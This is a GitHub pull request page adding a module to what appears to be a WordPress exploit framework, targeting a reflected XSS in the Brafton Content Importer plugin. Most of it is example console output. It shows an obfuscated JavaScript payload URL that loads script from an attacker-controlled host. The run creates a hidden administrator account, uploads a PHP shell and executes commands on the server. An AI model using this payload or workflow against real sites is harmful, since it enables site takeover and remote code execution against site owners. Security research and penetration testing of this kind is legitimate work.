Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Add Brafton Content Importer Module #31

Merged
rastating merged 1 commit into from
Jan 21, 2017
Merged

Add Brafton Content Importer Module #31

rastating merged 1 commit into from
Jan 21, 2017

Conversation

@phyushin
Copy link
Contributor

@phyushin phyushin commented Jan 21, 2017

This module exploits the "Brafton Content Importer" WordPress plugin; the plugin can be downloaded from the following URL:
https://github.com/BraftonSupport/BraftonWordpressPlugin/archive/v3.4.5.zip

Fixed in : 3.4.8
Note: the link for the plugin is the latest release [3.4.5] on GitHub but the vulnerability was fixed in 3.4.8

References:

example output:

wpxf > use exploit/brafton_content_importer_reflected_xss_shell_upload 

  [+] Loaded module:
      #<Wpxf::Exploit::BraftonContentImporterReflectedXssShellUpload:0x00000002f3a050>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set host 192.168.0.27

  [+] Set host => 192.168.0.27

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set xss_host 192.168.0.20

  [+] Set xss_host => 192.168.0.20

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set http_server_bind_port 8080

  [+] Set http_server_bind_port => 8080

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set payload exec

  [+] Loaded payload: #<Wpxf::Payloads::Exec:0x00000002edce78>

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > set cmd whoami

  [+] Set cmd => whoami

wpxf [exploit/brafton_content_importer_reflected_xss_shell_upload] > run

  [-] Provide the URL below to the victim to begin the payload upload

http://192.168.0.27/wp-admin/admin.php?page=BraftonArticleLoader&tab=eval(String.fromCharCode(101,118,97,108,40,100,101,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,47,118,97,114,37,50,48,97,37,50,48,37,51,68,37,50,48,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,37,50,56,37,50,50,115,99,114,105,112,116,37,50,50,37,50,57,37,51,66,97,46,115,101,116,65,116,116,114,105,98,117,116,101,37,50,56,37,50,50,115,114,99,37,50,50,37,50,67,37,50,48,37,50,50,104,116,116,112,37,51,65,37,50,70,37,50,70,49,57,50,46,49,54,56,46,48,46,50,48,37,51,65,56,48,56,48,37,50,70,97,79,116,72,89,84,120,66,37,50,50,37,50,57,37,51,66,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,37,50,56,97,37,50,57,37,51,66,47,46,115,111,117,114,99,101,41,41))

  [-] Started HTTP server on 0.0.0.0:8080
  [-] Incoming request received, serving JavaScript...
  [+] Created a new administrator user, DHnhab:erTPSVpUlA
  [-] HTTP server stopped
  [-] Authenticating with WordPress using DHnhab:erTPSVpUlA...
  [-] Uploading payload...
  [-] Executing the payload at
      http://192.168.0.27/wp-content/plugins/FSAfGcekVl/UUkabnbIWV.php...
  [+] Result: www-data
  [+] Execution finished successfully

@rastating rastating merged commit 7ece71f into rastating:development Jan 21, 2017
rastating added a commit that referenced this pull request Jan 21, 2017
@rastating
Land #31, Add Brafton Content Importer reflected XSS shell upload
778cf59
@rastating
Copy link
Owner

rastating commented Jan 21, 2017

This one is merged too 👍

@phyushin phyushin deleted the brafton_content_importer_reflected_xss branch February 23, 2018 21:42
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

2 participants

@phyushin @rastating